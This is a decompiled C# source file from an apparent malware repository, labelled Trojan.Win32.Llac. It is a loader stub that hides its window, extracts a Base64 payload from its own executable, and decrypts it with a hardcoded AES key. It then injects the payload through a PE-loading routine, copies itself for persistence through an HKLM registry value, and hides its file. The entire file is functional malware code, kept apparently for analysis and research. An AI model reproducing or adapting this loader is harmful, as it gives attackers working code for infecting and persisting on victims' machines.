MalwareSourceCode/MSIL/Trojan/Win32/L/Trojan.Win32.Llac.gxwf-aba0073bd9b9f0c6c0103f289f18d82411c0702308f5a0dbcae1b577edc263b3/c33361143b3e96389ca3aadf6fd2f8c02.cs

159 lines
5.0 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: A.c33361143b3e96389ca3aadf6fd2f8c02
// Assembly: Service, Version=2.0.0.2, Culture=neutral, PublicKeyToken=null
// MVID: B7AA2EBA-E600-4CD2-B54D-4503D0055DE2
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Llac.gxwf-aba0073bd9b9f0c6c0103f289f18d82411c0702308f5a0dbcae1b577edc263b3.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using Service;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Security.Cryptography;
using System.Text;
using System.Threading;
using System.Windows.Forms;
namespace A
{
[DesignerGenerated]
internal class c33361143b3e96389ca3aadf6fd2f8c02 : Form
{
private IContainer c67d8d6ffc9381949a45cc48e923e7d6b;
private const string c90a50beefabe2ff8dcb9c51f4ffb68e0 = "wgi2zxoukr0hhws5ycvnyjrrxzfk24frvabfyuttjnq3";
public c33361143b3e96389ca3aadf6fd2f8c02()
{
this.Load += new EventHandler(this.ca33f61d7102f4431a3b6c673001407cb);
this.c69adeaa069e1d4e4dda047bb574f6789();
}
[DebuggerNonUserCode]
protected override void Dispose(bool disposing)
{
try
{
if (!disposing || this.c67d8d6ffc9381949a45cc48e923e7d6b == null)
return;
this.c67d8d6ffc9381949a45cc48e923e7d6b.Dispose();
}
finally
{
base.Dispose(disposing);
}
}
[DebuggerStepThrough]
private void c69adeaa069e1d4e4dda047bb574f6789()
{
this.SuspendLayout();
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(31, 33);
this.FormBorderStyle = FormBorderStyle.None;
this.Name = ce63dce0f1ffb90aa10305820dbcda034.cc3c9ee62526a7d585181352f632908ee(472);
this.Opacity = 0.0;
this.ShowIcon = false;
this.ShowInTaskbar = false;
this.WindowState = FormWindowState.Minimized;
this.ResumeLayout(false);
}
private void ca33f61d7102f4431a3b6c673001407cb(
object ccdf542d5c3b6b24e4521e5d1ca516374,
EventArgs ceb7ff7b847fde7874be06426e2c0ad7d)
{
try
{
string[] strArray = Strings.Split(File.ReadAllText(Application.ExecutablePath), ce63dce0f1ffb90aa10305820dbcda034.cc3c9ee62526a7d585181352f632908ee(483));
byte[] data = this.cff89060edc9fe161ced6a50c85f119ef(Convert.FromBase64String(strArray[1]));
Encoding.GetEncoding(1252).GetBytes(strArray[1]);
PE32.PhysicalEducation(data, Application.ExecutablePath);
if (Conversions.ToBoolean(strArray[4]))
new Thread(new ThreadStart(this.cb45b3a15ef6872aec67104ac5095c88d))
{
IsBackground = false
}.Start();
if (Conversions.ToBoolean(strArray[3]))
{
string fileName = Path.GetFileName(Application.ExecutablePath);
c47f80583ee24444198d7c06b960fffd3.c729b9605db62bf70f7791c5de837e56e.FileSystem.CopyFile(Application.ExecutablePath, ce63dce0f1ffb90aa10305820dbcda034.cc3c9ee62526a7d585181352f632908ee(572) + fileName, true);
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(ce63dce0f1ffb90aa10305820dbcda034.cc3c9ee62526a7d585181352f632908ee(579), true);
registryKey.SetValue(fileName, (object) ce63dce0f1ffb90aa10305820dbcda034.cc3c9ee62526a7d585181352f632908ee(572));
registryKey.Close();
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Process.GetCurrentProcess().Kill();
ProjectData.ClearProjectError();
}
Process.GetCurrentProcess().Kill();
}
public void cb45b3a15ef6872aec67104ac5095c88d()
{
try
{
File.SetAttributes(Application.ExecutablePath, FileAttributes.Hidden);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public byte[] cff89060edc9fe161ced6a50c85f119ef(byte[] c595a5344dd4516dcddc22130a8ec8b1d)
{
using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
{
rijndaelManaged.IV = new byte[16]
{
(byte) 1,
(byte) 2,
(byte) 3,
(byte) 4,
(byte) 5,
(byte) 6,
(byte) 7,
(byte) 8,
(byte) 9,
(byte) 1,
(byte) 2,
(byte) 3,
(byte) 4,
(byte) 5,
(byte) 6,
(byte) 7
};
rijndaelManaged.Key = new byte[16]
{
(byte) 7,
(byte) 6,
(byte) 5,
(byte) 4,
(byte) 3,
(byte) 2,
(byte) 1,
(byte) 9,
(byte) 8,
(byte) 7,
(byte) 6,
(byte) 5,
(byte) 4,
(byte) 3,
(byte) 2,
(byte) 1
};
return rijndaelManaged.CreateDecryptor().TransformFinalBlock(c595a5344dd4516dcddc22130a8ec8b1d, 0, c595a5344dd4516dcddc22130a8ec8b1d.Length);
}
}
}
}